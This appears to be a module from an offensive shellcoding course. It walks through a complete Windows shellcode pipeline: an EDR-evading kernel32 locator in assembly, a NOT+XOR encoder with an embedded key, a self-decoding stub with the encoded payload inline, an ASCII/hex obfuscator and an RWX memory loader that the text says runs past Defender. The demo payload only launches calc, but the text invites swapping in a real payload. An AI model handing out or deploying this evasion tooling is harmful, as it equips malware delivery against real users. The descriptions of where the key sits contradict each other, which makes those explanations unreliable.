You've now completed the full x64 Assembly and Shellcoding 101 curriculum. Here's where these skills lead:
- Advanced x64 Assembly — tighter function lookup loops, position-independent data access via RIP-relative addressing, SYSCALL-based API resolution bypassing ntdll hooks
- EDR Evasion and Shellcode Loaders — process injection techniques, DLL stomping, indirect syscalls, sleep obfuscation, and shellcode encryption
- Exploit Development — applying your shellcode in buffer overflow, use-after-free, and heap exploitation contexts
- Reverse Engineering — reading other people's shellcode in x64dbg / Ghidra with the internals knowledge from this course
💡 The best next step is writing your own variants of everything in this course from scratch — without the notes. That's when you'll know you've actually internalized x64 assembly.

✓ Course Complete. You've gone from registers and stack alignment to a fully dynamic NULL-free reverse shell in pure x64 assembly. The code templates and full source files are in your course download. Now go break things — legally. 🐱

Module Nine

Python Shellcode Generator — TEB Walk, Extraction & NOT+XOR Encoding

// From .asm to encoded deploy-ready bytes — entirely on Windows, no VM needed

Learning Objectives

Write a TEB-based kernel32 locator that defeats EDR hooks on the standard PEB walk path
Use Python on Windows to extract raw shellcode bytes from a compiled .obj — no Linux VM required
Apply Bitwise NOT + XOR encoding in a single Python script to produce static-analysis-resistant shellcode
Understand how embedding the key inside the encoded payload enables self-decoding without hardcoding its position
Use the assembly junk-instruction inserter to produce different bytes on every compilation run

Why a New Kernel32 Walk? — Defeating EDR Hooks

The standard PEB walk from Module 2 traverses InMemoryOrderModuleList and trusts list position to find kernel32 — the third entry. This works on clean systems, but some EDR products (notably Avast) hook the initial loader modules. Walking by position can return the hooked version rather than the real kernel32 base.

The solution: instead of trusting position, search the module list for a module whose Unicode name starts with KERN. Unless the EDR names their hook KERNxx.dll, you skip right past the hook and land on the real KERNEL32.DLL. Note that KERNELBASE.dll also starts with KERN, so the search relies on KERNEL32.DLL appearing first in the list, which is normally the case in load order. This approach also starts from the TEB rather than directly from GS:[0x60], a subtle but meaningful structural difference that adds resilience against intercepted fast paths.

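Walk chain: GS:[0x30] → TEB base → [TEB+0x60] → PEB → [PEB+0x18] → PEB_LDR_DATA → [Ldr+0x10] → InLoadOrderModuleList → iterate checking Unicode name bytes for KERN. (Offset 0x10 in PEB_LDR_DATA is InLoadOrderModuleList; InMemoryOrderModuleList sits at 0x20. The entry offsets used in the code, +0x30 for DllBase and +0x60 for the BaseDllName buffer, are relative to the load-order links.)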

      NASM x64
      calc.asm — TEB-based kernel32 finder + WinExec("calc.exe")
    
; calc.asm — g3tsyst3m Module 9
; Compile: nasm -fwin64 calc.asm -o calc.obj
; Link:    ld -m i386pep -o calc.exe calc.obj
;
; Key difference from Module 2 PEB walk:
;   - Starts from TEB (GS:[0x30]) not PEB (GS:[0x60]) directly
;   - Searches for Unicode "KERN" rather than trusting list position
;   - Bypasses EDR hooks that intercept the standard 3rd-entry shortcut

BITS 64
SECTION .text
global main
main:
sub  rsp, 0x28
and  rsp, 0xFFFFFFFFFFFFFFF0
xor  rcx, rcx

; ── TEB → PEB ──────────────────────────────────────────────────────
mov  rax, [gs:0x30]         ; RAX = TEB base (GS:[0x30] always points to TEB)
mov  rax, [rax+0x60]        ; RAX = PEB base (TEB.PebBaseAddress at +0x60)

; ── PEB → LDR → InLoadOrderModuleList ──────────────────────────────
mov  rax, [rax+0x18]        ; RAX = PEB.Ldr (PEB_LDR_DATA*)
mov  rsi, [rax+0x10]        ; RSI = Ldr.InLoadOrderModuleList.Flink (first LDR_DATA_TABLE_ENTRY)

; ── Walk list searching for Unicode "KERN" ──────────────────────────
checkit:
mov  rsi, [rsi]
mov  rcx, [rsi+0x60]        ; RCX = pointer to module name Unicode buffer
mov  rbx, [rcx]             ; RBX = first 8 bytes of Unicode name
mov  rdx, 0x004E00520045004B  ; "K E R N" in UTF-16LE: K=004B E=0045 R=0052 N=004E
cmp  rbx, rdx
jz   foundit
jnz  checkit

foundit:
mov  rbx, [rsi+0x30]         ; RBX = DllBase (kernel32 base address)
mov  r8,  rbx                ; R8  = kernel32 base (R8 is volatile, but nothing is called before WinExec)

; ── Parse Export Address Table ──────────────────────────────────────
mov  ebx, [rbx+0x3C]
add  rbx, r8
xor  rcx, rcx
add  cx,  0x88ff             ; NULL-free way to build 0x88
shr  rcx, 0x8                ; RCX = 0x88
mov  edx, [rbx+rcx]          ; EDX = Export Directory RVA
add  rdx, r8                 ; RDX = Export Directory VMA
mov  r10d,[rdx+0x14]
xor  r11, r11
mov  r11d,[rdx+0x20]
add  r11, r8
mov  rcx, r10

; ── Push "WinExec" using NOT encoding + SHL/SHR null termination ────
mov  rax, 0x6F9C9A87BA9196A8  ; NOT-encoded "WinExec" — no plaintext in bytes
not  rax                     ; decode: RAX = 0x90636578456E6957
shl  rax, 0x8
shr  rax, 0x8                ; RAX = "WinExec\0" — null in MSB, not in shellcode bytes
push rax
mov  rax, rsp
add  rsp, 0x8

; ── Search AddressOfNames for "WinExec" ─────────────────────────────
kernel32findfunction:
jecxz FunctionNameNotFound
xor  ebx, ebx
mov  ebx, [r11+rcx*4]
add  rbx, r8
dec  rcx
mov  r9, [rax]
cmp  [rbx], r9
jz   FunctionNameFound
jnz  kernel32findfunction

FunctionNameNotFound:
int3

FunctionNameFound:
inc  ecx
xor  r11, r11
mov  r11d,[rdx+0x1c]
add  r11, r8
mov  r15d,[r11+rcx*4]
add  r15, r8                ; R15 = WinExec VMA

; ── Call WinExec("calc.exe", 1) ─────────────────────────────────────
xor  rax, rax
push rax
mov  rax, 0x9A879AD19C939E9C  ; NOT-encoded "calc.exe"
not  rax
push rax
mov  rcx, rsp
xor  rdx, rdx
inc  rdx
sub  rsp, 0x30
call r15

ℹ The Unicode comparison value 0x004E00520045004B encodes "K E R N" as UTF-16LE WORD pairs: K=004B, E=0045, R=0052, N=004E stored as an 8-byte little-endian immediate. A single cmp rbx, rdx checks all four characters simultaneously.
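
The comparison constant can be reproduced in Python, which is handy if you want to match a different module prefix. A minimal sketch, with `utf16_qword` as a hypothetical helper name; it assumes a prefix of exactly four characters from the Basic Multilingual Plane so the UTF-16LE encoding is exactly 8 bytes.

```python
def utf16_qword(prefix):
    """Encode a 4-character prefix as UTF-16LE and return it as one little-endian QWORD."""
    raw = prefix.encode("utf-16-le")
    if len(raw) != 8:
        raise ValueError("prefix must encode to exactly 8 bytes (4 UTF-16 code units)")
    return int.from_bytes(raw, "little")


if __name__ == "__main__":
    print(f"0x{utf16_qword('KERN'):016X}")
```

The comparison is case-sensitive, so the constant only matches if the loader recorded the module name in upper case.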

Tool 1 — findhex.py: Windows-Native Shellcode Extraction

Extracting raw shellcode bytes from a compiled .obj file historically required Linux tools. This Python script runs on Windows using the MinGW-bundled objdump. It parses the disassembly output, strips the byte columns, and outputs them as \xNN escape sequences ready to paste into a loader — no VM, no Linux, no context switch.

      Python
      findhex.py — extract \xNN shellcode bytes from .obj on Windows
    
# findhex.py — g3tsyst3m Module 9
# Extracts raw shellcode bytes from a NASM-compiled .obj file
# Requires: MinGW objdump in PATH (included with the NASM/MinGW toolchain)
# Usage:    python findhex.py calc.obj
# Output:   \x4d\x87\xe6\x48... printed to stdout

import re
import subprocess
import sys

def generateshellcode(obj_file):
    result = subprocess.run(
        ['objdump', '-D', obj_file],
        capture_output=True, text=True, check=True
    )
    objdump_output = result.stdout

    # Replace " <" so label text like "<main>" doesn't match the hex regex
    objdump_output = objdump_output.replace(" <", "--|")

    # Match exactly two hex chars followed by a space — the byte column format
    # Negative lookbehind prevents matching hex that's part of an address
    pattern = r'(?<![a-zA-Z])[0-9a-fA-F]{2} '
    matches = re.findall(pattern, objdump_output, flags=re.IGNORECASE)

    prefixed_hex = [r'\x' + m.strip() for m in matches]
    print(''.join(prefixed_hex))

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python findhex.py <.obj file>"); sys.exit(1)
    generateshellcode(sys.argv[1])

Tool 2 — NOT + XOR Encoder with Embedded Key

This encoder applies Bitwise NOT to every byte first, then XORs with a chosen key (default 0xAC). The result contains no recognizable API name strings and no common shellcode byte patterns. What makes it especially useful: the XOR key is embedded inside the encoded payload at position key_value % payload_length. Change the key and both the encoded bytes and the key's position in the output change — two layers of variability from one parameter.

The decoder stub reverses in order: XOR each byte with the key, then NOT — both operations are self-inverse so the decode is structurally identical to the encode.

      Python
      not_xor_encoder.py — Bitwise NOT + XOR with embedded key discovery
    
# not_xor_encoder.py — g3tsyst3m Module 9
# Two-pass encoder: NOT every byte, then XOR with key
# The key byte is embedded in the output at position (key % len) — self-locating
# Usage: paste findhex.py output into shellcode variable, then run this script
# Change xor_key to any non-null byte; 0xAC avoids bad chars for this shellcode

import sys

# Paste findhex.py output here:
shellcode = (
    b"\x4d\x87\xe6\x48\x83\xec\x28\x48\x8d\x3f\x48\x83\xe4\xf0"
    # ... full shellcode from findhex.py
)

xor_key = 0xAC

# Step 1 — Bitwise NOT every byte
not_encoded = bytearray((~b) & 0xFF for b in shellcode)

# Step 2 — XOR with key
not_xor = bytearray(b ^ xor_key for b in not_encoded)

# Step 3 — Embed key at deterministic position
# Position = key_value % payload_length
# Changing the key changes both the encoded bytes AND the position — double variability
key_pos = xor_key % len(not_xor)
encoded = bytearray(not_xor)
encoded.insert(key_pos, xor_key)

result = ''.join(f'\\x{b:02x}' for b in encoded)
print(f"[*] Encoded shellcode ({len(encoded)} bytes):")
print(result)
print()
print(f"[*] XOR key:          0x{xor_key:02x}")
print(f"[*] Key position:     offset {key_pos} in encoded output")
print(f"[*] Decode at runtime: XOR each byte with key, then NOT")

Tool 3 — The NOT+XOR Decoder in x64 Assembly

With the shellcode encoded, the runtime decoder needs to reverse both operations in correct order: XOR each byte with the key first, then NOT each byte. Because both NOT and XOR are self-inverse, the decode loop is structurally identical to how you'd write the encode — just applied at runtime in memory rather than at script time.
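
The self-inverse property is easy to confirm with a round trip in Python. This sketch covers only the per-byte NOT and XOR transforms, not the key-embedding step; `encode` and `decode` are hypothetical names, and the four sample bytes are the first bytes of the example payload shown in this module.

```python
def encode(data, key):
    """NOT every byte, then XOR with the key (the order used by the encoder script)."""
    return bytes(((~b) & 0xFF) ^ key for b in data)


def decode(data, key):
    """XOR every byte with the key, then NOT (the order used by the decoder loop)."""
    return bytes((~(b ^ key)) & 0xFF for b in data)


if __name__ == "__main__":
    original = bytes.fromhex("4d87e648")
    encoded = encode(original, 0xAC)
    print("encoded:", encoded.hex())
    print("round trip ok:", decode(encoded, 0xAC) == original)
```

Since NOT is the same as XOR with 0xFF, the two steps commute: applying them in either order yields the same byte.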

The key lives inside the encoded shellcode at a known index position — printed by the encoder script. For the example below, key index 38 was chosen: mov r9b, [rel encoded_shellcode + 38]. The decoder reads the key directly from the payload, walks every byte applying XOR then NOT, then reloads the base address and jumps to the now-restored shellcode via jmp rax.

      NASM x64
      decoder.asm — NOT+XOR decoder stub with encoded shellcode inline in .text
    
; decoder.asm — g3tsyst3m Module 9
; Compile: nasm -fwin64 decoder.asm
; Link:    ld -m i386pep -N -o decoder.exe decoder.obj
;
; -N flag: makes .text section writable+executable (needed because the decoder
;          writes decoded bytes back into encoded_shellcode in-place at runtime)
;
; Key index 38 was chosen from the not_xor_encoder.py output — the offset where
; the encoder embedded key byte 0xAC inside the encoded payload.

BITS 64

section .data

section .text
global main

main:
    ; ── Load base address of encoded_shellcode RIP-relative ────────────
    lea  rsi, [rel encoded_shellcode]
    ; ── Read the embedded key from its known index in the payload ──────
    mov  r9b, [rel encoded_shellcode + 38]  ; R9B = XOR key (0xAC at index 38)
    ; ── Set loop counter = payload length ──────────────────────────────
    mov  rcx, encoded_shellcode_len         ; immediate value, no rel needed for EQU

decode_loop:
    mov  al,  [rsi]                       ; AL = current encoded byte
    xor  al,  r9b                         ; AL ^= key  → reverses XOR encoding step
    not  al                               ; AL = ~AL  → reverses NOT encoding step
    mov  [rsi], al                       ; write original byte back in-place
    inc  rsi                              ; advance pointer
    loop decode_loop                     ; dec RCX, repeat until zero

    ; ── Jump to fully decoded shellcode ────────────────────────────────
    lea  rax, [rel encoded_shellcode]     ; reload base (RSI advanced past end during decode)
    jmp  rax                              ; execute the now-decoded calc shellcode

; ── NOT+XOR encoded payload — inline in .text ───────────────────────
; Generated by not_xor_encoder.py on the TEB-walk calc.asm shellcode.
; Key 0xAC embedded at offset 38 (the 0xAC byte at position [38]).
encoded_shellcode:
db 0x1e,0xd4,0xb5,0x1b,0xd0,0xbf,0x7b,0x1b,0xde,0x6c,0x1b,0xd0,0xb7,0xa3
db 0x1e,0xd4,0xa7,0x1b,0x62,0x9a,0x1a,0xd4,0xaf,0x36,0x1b,0xd8,0x57,0x76
db 0x63,0x53,0x53,0x53,0x1b,0xd8,0x13,0x33,0x1b,0x62,0xac,0x1b,0xd8,0x13
db 0x4b,0x1a,0xd4,0xad,0x1b,0xd8,0x23,0x43,0x1b,0xd0,0x94,0x53,0x1b,0xd8
db 0x65,0x1f,0xd4,0xbc,0x1b,0xd8,0x1d,0x33,0x1f,0xd4,0xbc,0x1b,0xd8,0x4a
db 0x1e,0xd4,0xbf,0x1b,0xe9,0x18,0x53,0x16,0x53,0x01,0x53,0x1d,0x53,0x1b
db 0x62,0xac,0x1b,0x6a,0x80,0x27,0x5b,0x1a,0xd4,0xaf,0x26,0x85,0x1f,0xd4
db 0xb4,0x1b,0xd8,0x0d,0x63,0x1e,0xda,0xa5,0x1a,0xda,0x8b,0x1e,0xd4,0xb6
db 0xd8,0x08,0x6f,0x1e,0x38,0xb7,0x52,0x1f,0x52,0x90,0x1e,0xda,0xb7,0x1b
db 0x62,0x9a,0x1a,0x92,0xb6,0x53,0x35,0xd2,0x92,0xac,0xdb,0x1e,0xd4,0xbd
db 0x1b,0x92,0xba,0x5b,0x1a,0x92,0x9f,0x53,0xd8,0x47,0x58,0x1f,0xd4,0xb4
db 0x1f,0x52,0x91,0x1e,0xda,0xbe,0x17,0xd8,0x01,0x47,0x1e,0x62,0xbe,0x1e
db 0x62,0x88,0x1a,0xd0,0xbf,0x53,0x17,0xd8,0x09,0x73,0x1a,0xd0,0xad,0x53
db 0x1e,0x52,0x90,0x1e,0xd4,0xbd,0x1f,0xda,0x82,0x1f,0xd4,0xbc,0x1b,0xeb
db 0xfb,0xc5,0xc2,0xe9,0xd4,0xc9,0xcf,0x3c,0x1b,0x92,0x9c,0x53,0x1b,0xa4
db 0x83,0x1a,0xd4,0xae,0x1b,0x92,0xb3,0x5b,0x1e,0xda,0xbe,0x1b,0x92,0xbb
db 0x5b,0x1e,0xd4,0xb5,0x03,0x1e,0xd6,0xa5,0x1b,0xda,0xb3,0x1a,0xd4,0xad
db 0x1b,0xd0,0x97,0x5b,0x1e,0xda,0xb7,0x34,0xb0,0x63,0x1a,0xd4,0xad,0x62
db 0x88,0x1a,0xd4,0xaf,0x12,0xd8,0x4f,0xd8,0x1b,0x92,0xb4,0x53,0x1f,0x52
db 0x90,0x1e,0xd4,0xb5,0x1b,0xac,0x9a,0x1a,0xd4,0xaf,0x1f,0xd8,0x5b,0x1e
db 0xd4,0xa7,0x1f,0x6a,0x58,0x27,0x5e,0x1e,0xd4,0xbd,0x26,0x82,0x1a,0x92
db 0xb5,0x53,0x9f,0x1a,0xd4,0xaf,0xac,0x92,0x1e,0xd6,0xb7,0x1e,0x62,0x88
db 0x1e,0xd4,0xa7,0x17,0xd8,0x09,0x4f,0x1f,0xd4,0xa4,0x1e,0x52,0x90,0x1e
db 0xd4,0xbf,0x16,0xd8,0x6f,0xd8,0x1a,0xd4,0xad,0x1e,0x52,0x94,0x1e,0x62
db 0xa5,0x1b,0x62,0x93,0x1a,0xd0,0x96,0x53,0x03,0x1a,0xd4,0xae,0x1b,0xeb
db 0xcf,0xcd,0xc0,0xcf,0x82,0xc9,0xd4,0xc9,0x1a,0xd0,0xaf,0x53,0x1b,0xa4
db 0x83,0x1e,0xd4,0xbd,0x03,0x1a,0xd4,0xad,0x1b,0xda,0xb2,0x1e,0xd6,0xb7
db 0x1b,0x62,0x81,0x1e,0xd4,0xbd,0x1b,0xac,0x91,0x1a,0xd4,0xad,0x1b,0xd0
db 0xbf,0x63,0x1a,0xd4,0xaf,0x12,0xac,0x84,0x1e,0xd4,0xa7,0x53,0x53,0x53
db 0x53,0x53
encoded_shellcode_len equ $ - encoded_shellcode

ℹ The -N linker flag (--omagic) marks the .text section writable+executable. This is required for the standalone test binary because the decoder writes decoded bytes back into encoded_shellcode in-place — which lives in .text. The C++ loader below uses PAGE_EXECUTE_READWRITE VirtualAlloc memory instead, so -N is not needed there.
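
As a quick sanity check on the listing above, the per-byte decode can be reproduced offline. This is a minimal sketch that assumes the stub XORs each byte with the key and then applies a bitwise NOT, as the module describes; `decode_byte` and `encoded_prefix` are illustrative names, not part of the course tooling.

```python
KEY = 0xAC  # XOR key named in the listing comment


def decode_byte(b: int, key: int = KEY) -> int:
    """Mirror the stub's per-byte work: XOR with the key, then bitwise NOT."""
    return ~(b ^ key) & 0xFF


# First three bytes of the encoded_shellcode db block
encoded_prefix = bytes([0x1E, 0xD4, 0xB5])
decoded_prefix = bytes(decode_byte(b) for b in encoded_prefix)

print(decoded_prefix.hex())
```

Because NOT and XOR commute, applying the same operation twice returns the original byte, so the function works as a toy encoder as well. The key byte itself (0xAC at index 38) decodes to 0xFF.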

Tool 4 — Alpha/Mix Encoding: Converting to ASCII-Printable Shellcode

The final encoding layer converts the complete payload (decoder stub + encoded shellcode) into a mixed ASCII/hex format where each byte is expressed as its printable ASCII character if one exists, and as a \xNN hex escape otherwise. This is the "alpha/mix" format — not purely alphanumeric, but as human-readable as the byte values allow, and compatible with C string literal delivery.

The workflow: compile decoder.asm to a .obj, run findhex.py on it to extract all bytes (decoder stub bytes + inline encoded shellcode), then pass that full byte string through the alpha/mix script. The output pastes directly into a C const unsigned char shellcode[] string literal — adjacent tokens are concatenated automatically by the compiler.

      Python
      alpha_mix.py — convert binary shellcode bytes to mixed ASCII/hex C string tokens
    
# alpha_mix.py — g3tsyst3m Module 9
# Converts binary shellcode to mixed ASCII/hex format for C string literals.
# Printable bytes → their ASCII character. Non-printable → \xNN escape.
# Special cases handle ' and " to avoid breaking C string literal syntax.
#
# Input:  hex_list = full payload bytes from findhex.py on the decoder .obj
#         (includes decoder stub bytes + encoded_shellcode bytes inline)
# Output: space-separated string tokens — paste into shellcode[] in loader.cpp

# Paste findhex.py output from decoder.obj here:
# (this is the full combined payload: decoder stub + encoded shellcode)
hex_list = (
    b"\x48\x8d\x35\x23\x00\x00\x00\x44\x8a\x0d\x42\x00\x00\x00"
    b"\xb9\x98\x01\x00\x00\x8a\x06\x44\x30\xc8\xf6\xd0\x88\x06"
    b"\x48\xff\xc6\xe2\xf2\x48\x8d\x05\x02\x00\x00\x00\xff\xe0"
    # ... followed by all encoded_shellcode bytes
)

alphanumericfinal = []
for bytey in hex_list:
    if bytey == 0x27:                       # single quote: emit \' so the literal stays well-formed
        alphanumericfinal.append("\"\\'\"" )
    elif bytey == 0x22:                      # double quote: emit \" so it does not end the literal
        alphanumericfinal.append('\"\\""')
    elif bytey == 0x20:                      # space: explicit hex to avoid ambiguity
        alphanumericfinal.append("\"\\x20\"")
    else:
        # repr() yields 'H', '\x8d', '\r', ... Most bytes from 0xA1 upward come out as raw
        # Latin-1 characters such as 'È', so loader.cpp must be saved in a single-byte
        # encoding (not UTF-8), or each of those characters becomes two bytes.
        r = repr(chr(bytey)).replace("'", '"')   # swap repr's single quotes for double quotes
        alphanumericfinal.append(r)

print(' '.join(alphanumericfinal))            # space-separated: "H" "\x8d" "5" "#" ...
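
If depending on the source file's encoding is a concern, a stricter variant can emit only 7-bit printable ASCII and hex-escape everything else. The sketch below is an assumption-laden alternative, not the course's script: `to_c_tokens` is a hypothetical helper, and it also escapes the backslash and `?` for safety.

```python
def to_c_tokens(payload: bytes) -> str:
    """Return space-separated C string tokens, one per byte (hypothetical helper)."""
    tokens = []
    for b in payload:
        ch = chr(b)
        if 0x21 <= b <= 0x7E and ch not in '"\'\\?':
            tokens.append(f'"{ch}"')          # printable ASCII is written as-is
        else:
            tokens.append(f'"\\x{b:02x}"')    # everything else becomes a hex escape
    return " ".join(tokens)


sample = bytes.fromhex("488d3523000000")      # first 7 bytes of hex_list above
print(to_c_tokens(sample))
# "H" "\x8d" "5" "#" "\x00" "\x00" "\x00"
```

Keeping one token per byte matters: inside a single literal, `\x8d` followed by `5` would be read as the over-long escape `\x8d5`, whereas adjacent literals are escaped individually before the compiler concatenates them.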

The Final C++ Loader

The alpha/mix output pastes directly into the shellcode[] array. The decoder stub runs first, decodes the embedded payload in-place, then jmp rax executes the original TEB-walk calc shellcode. PAGE_EXECUTE_READWRITE is required because the decoder modifies its own payload bytes at runtime — read+execute alone is insufficient.

      C++
      loader.cpp — final shellcode loader using the alpha/mix encoded payload
    
// loader.cpp — g3tsyst3m Module 9
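// Paste alpha_mix.py output into shellcode[] below as adjacent string literals.
// The compiler concatenates them into a single continuous byte array.
// Save this file in a single-byte encoding (e.g. Latin-1): raw characters such as
// "È" must occupy one byte each, and UTF-8 would store them as two.
// Compile: x86_64-w64-mingw32-g++ -o loader.exe loader.cpp

#include <windows.h>
#include <cstring>    // memcpy
#include <iostream>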

const unsigned char shellcode[] =
    "H" "\x8d" "5" "#" "\x00" "\x00" "\x00" "D" "\x8a" "\r" "B" "\x00" "\x00" "\x00" "¹" "\x98"
    "\x01" "\x00" "\x00" "\x8a" "\x06" "D" "0" "È" "ö" "Ð" "\x88" "\x06" "H" "ÿ" "Æ" "â"
    "ò" "H" "\x8d" "\x05" "\x02" "\x00" "\x00" "\x00" "ÿ" "à"
    /* ... paste full alpha_mix.py output here ... */ ;

int main() {
    size_t shellcode_size = sizeof(shellcode);

    // PAGE_EXECUTE_READWRITE required — decoder stub writes decoded bytes in-place
    void* exec_mem = VirtualAlloc(
        nullptr, shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed\n";
        return -1;
    }

    memcpy(exec_mem, shellcode, shellcode_size);

    // Cast and call — decoder stub runs first, decodes payload, jmps to shellcode
    auto fn = reinterpret_cast<void(*)()>(exec_mem);
    fn();

    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}

Normally a linked executable's .text section is marked read+execute but not writable. The decoder writes decoded bytes back to encoded_shellcode, which lives in .text. Without -N, this write triggers an access violation before a single byte is decoded.

-N (also known as --omagic) tells the GNU linker to mark the text segment as writable, giving it read+write+execute permissions. This is only needed for the standalone decoder.exe test — when using the C++ loader, the shellcode lives in a PAGE_EXECUTE_READWRITE VirtualAlloc region which is already writable by definition.

💡 A quick test workflow: compile decoder.asm with nasm + ld -N, run decoder.exe, verify calc appears. Then extract bytes with findhex.py, run alpha_mix.py, paste into loader.cpp, compile and run. Getting the same result confirms the full pipeline end to end before you swap in a real payload.

Pure alphanumeric encoding (only A-Za-z0-9 bytes) requires a specialized encoder like ALPHA3 that transforms every byte to fall in that ASCII range, at the cost of roughly 2–3x payload size expansion and an additional alphanumeric decoder stub on top. The alpha/mix approach is simpler and avoids the size penalty: just express each byte as its printable ASCII character if it has one, and leave non-printable bytes as \xNN.

The benefits of alpha/mix for this use case:
- Visually obscures the payload in source code — a mix of Latin characters, symbols, and hex escapes looks far less like shellcode than a dense block of \xNN\xNN\xNN
- No payload size expansion — one byte stays one byte
- Direct C string literal compatibility — the compiler concatenates adjacent tokens automatically
- The special-case handlers for 0x27 and 0x22 prevent C string literal syntax errors that would break compilation, and 0x20 is emitted as \x20 so the space stays explicit

Index 38 is just one of the valid key positions the encoder found. Any index where the encoded output byte equals the XOR key value (0xAC) is a valid choice. The encoder prints all such positions; you pick one and hardcode it as the offset in mov r9b, [rel encoded_shellcode + N].

Choosing a different valid index changes the RIP-relative displacement encoded in that MOV, so the assembled stub bytes differ as well, giving yet more variability in the final payload signature.

You can also change the XOR key entirely: pick a different key in not_xor_encoder.py and the encoder produces a completely different encoded payload. Re-check the valid index positions it prints and update the index in the decoder assembly accordingly. Every key and index combination produces different bytes in both the encoded payload and the stub.
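
The index rule can be illustrated on made-up bytes. This sketch assumes the encoder applies NOT and then XOR to each byte and does nothing else; `encode`, `key_positions`, and the `toy` payload are hypothetical stand-ins for the real script and shellcode.

```python
KEY = 0xAC


def encode(payload: bytes, key: int) -> bytes:
    """Toy NOT + XOR encoder: bitwise NOT each byte, then XOR with the key."""
    return bytes((~b & 0xFF) ^ key for b in payload)


def key_positions(encoded: bytes, key: int) -> list[int]:
    """Indices where the encoded byte equals the key, i.e. usable key offsets."""
    return [i for i, b in enumerate(encoded) if b == key]


toy = bytes([0x90, 0xFF, 0x41, 0xFF, 0xC3])   # made-up bytes, not real shellcode
encoded = encode(toy, KEY)

print(encoded.hex())
print(key_positions(encoded, KEY))
```

Under that assumption, an encoded byte equals the key exactly where the original byte was 0xFF, which is why the encoder can report several candidate indices for one payload.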

⚠ After changing the key or index, always recompile and test the decoder standalone before embedding in a loader. A wrong index reads the wrong byte as the key, decodes to garbage, and crashes silently.

The full pipeline from source to deployable shellcode, end to end on Windows:
- calc.asm — TEB-based kernel32 finder + WinExec, NULL-free, bypasses EDR position-based hooks
- not_xor_encoder.py — Bitwise NOT + XOR encoding with self-embedded key at deterministic index
- decoder.asm — x64 stub that reads key from embedded position, XOR+NOT decodes in-place, jmp rax executes
- findhex.py — Windows-native .obj byte extraction, no Linux VM required
- alpha_mix.py — converts binary payload to mixed ASCII/hex C string literal format
- loader.cpp — VirtualAlloc RWX + memcpy + call — runs on fully patched Windows with Defender active
No msfvenom. No Metasploit. No Linux toolchain. Every tool in this pipeline was written from scratch and runs natively on Windows.

Full Pipeline — From .asm to Final Alpha/Mix Shellcode

      Shell
      Complete workflow — calc.asm → encoded → decoder stub → alpha/mix → loader.cpp
    
# ── Stage 1: The payload shellcode ──────────────────────────────────

# Write calc.asm (TEB-walk kernel32 finder + WinExec)

# Compile to .obj
nasm -fwin64 calc.asm -o calc.obj

# Extract raw bytes
python findhex.py calc.obj
#    Output: \x4d\x87\xe6... → paste into not_xor_encoder.py shellcode variable

# Encode with NOT + XOR + embedded key
python not_xor_encoder.py
#    Output: encoded bytes + "Key embedded at position: N"
#    Note the key index — you'll need it for decoder.asm

# ── Stage 2: The decoder stub ────────────────────────────────────────

# Paste encoded bytes into decoder.asm as the encoded_shellcode db block
# Update the key index: mov r9b, [rel encoded_shellcode + N]
# Compile (no -no-pie needed; -N makes .text writable for standalone test)
nasm -fwin64 decoder.asm -o decoder.obj
ld -m i386pep -N -o decoder.exe decoder.obj

# Test standalone: decoder.exe should launch calc.exe — confirms decode works
decoder.exe

# ── Stage 3: Extract + alpha/mix encode ─────────────────────────────

# Extract full payload from decoder.obj (stub + encoded shellcode)
python findhex.py decoder.obj
#    Output: full combined bytes → paste into alpha_mix.py hex_list variable

# Convert to mixed ASCII/hex C string tokens
python alpha_mix.py
#    Output: "H" "\x8d" "5" "#" "\x00" ... → paste into loader.cpp shellcode[]

# ── Stage 4: Final loader ────────────────────────────────────────────

# Paste alpha_mix.py output into loader.cpp shellcode[] array
# Compile and run — decoder stub fires, decodes in-place, calc.exe launches
x86_64-w64-mingw32-g++ -o loader.exe loader.cpp

Both paths reach the PEB, but the standard mov rax, [gs:0x60] shortcut is a well-known and well-monitored access pattern. Some EDR products hook or monitor this specific GS segment offset access to detect shellcode performing PEB walks.

Going through the TEB explicitly — gs:[0x30] for TEB base, then [rax+0x60] for PEB — is architecturally equivalent but takes a different code path. It also mirrors how Windows itself navigates these structures internally, making it harder to distinguish from legitimate code.

💡 In WinDbg: dt nt!_TEB @$teb shows the TEB layout. ProcessEnvironmentBlock is at offset 0x060. dt nt!_PEB @$peb shows the PEB layout; Ldr is at 0x018.

Windows stores module names as UTF-16LE strings. Each ASCII character becomes a 2-byte WORD: the ASCII value in the low byte, 0x00 in the high byte. Reading "KERN" as four UTF-16LE WORDs:
- K = 0x004B, E = 0x0045, R = 0x0052, N = 0x004E
- In memory (little-endian): 4B 00 45 00 52 00 4E 00
- As a 64-bit little-endian immediate: 0x004E00520045004B
Loading [rcx] (first 8 bytes of the name buffer) into RBX and comparing with this immediate checks all four characters in a single instruction. It's both efficient and NULL-free.
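
The immediate can be derived mechanically rather than by hand. The helper below is a small sketch; `name_prefix_imm64` is an illustrative name, and it assumes the prefix is exactly four characters that each fit in one UTF-16 code unit.

```python
def name_prefix_imm64(prefix: str) -> int:
    """Pack a 4-character name prefix into the 64-bit value read from the name buffer."""
    raw = prefix.encode("utf-16-le")          # e.g. "KERN" -> 4B 00 45 00 52 00 4E 00
    if len(prefix) != 4 or len(raw) != 8:
        raise ValueError("expected exactly four single-unit UTF-16 characters")
    return int.from_bytes(raw, "little")      # interpret those 8 bytes as a little-endian QWORD


value = name_prefix_imm64("KERN")
print(f"0x{value:016X}")
# 0x004E00520045004B
```

The comparison is case-sensitive, so the prefix passed in has to match the characters exactly as they appear in the module's name buffer.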

💡 To search for a different DLL: take the first 4 characters of its name, encode each as a WORD (char + 0x00), then build the 8-byte little-endian immediate. For ntdll.dll: N=0x004E T=0x0054 D=0x0044 L=0x004C → 0x004C00440054004E. Match the case exactly as the loader stores it, which you can confirm in WinDbg; ntdll is commonly listed in lowercase, which would give 0x006C00640074006E instead.

Embedding the key at position = xor_key % len(payload) means the key byte position is a function of the key value itself. Change xor_key from 0xAC to 0x7F and two things change simultaneously:
- All encoded bytes change — different XOR key produces completely different output bytes
- The key's position in the output changes — 0x7F % len vs 0xAC % len are almost certainly different offsets
This means a static signature targeting "the key byte is at offset N" is invalidated just by changing the key. The decoder stub computes the position formula itself, so it works for any key without modification.

⚠ Always verify the round-trip after changing the key. Some keys produce bad characters (0x00, 0x20, 0x0A, 0x0D) in the encoded output that will break delivery through string-handling functions. Test with your specific delivery mechanism.

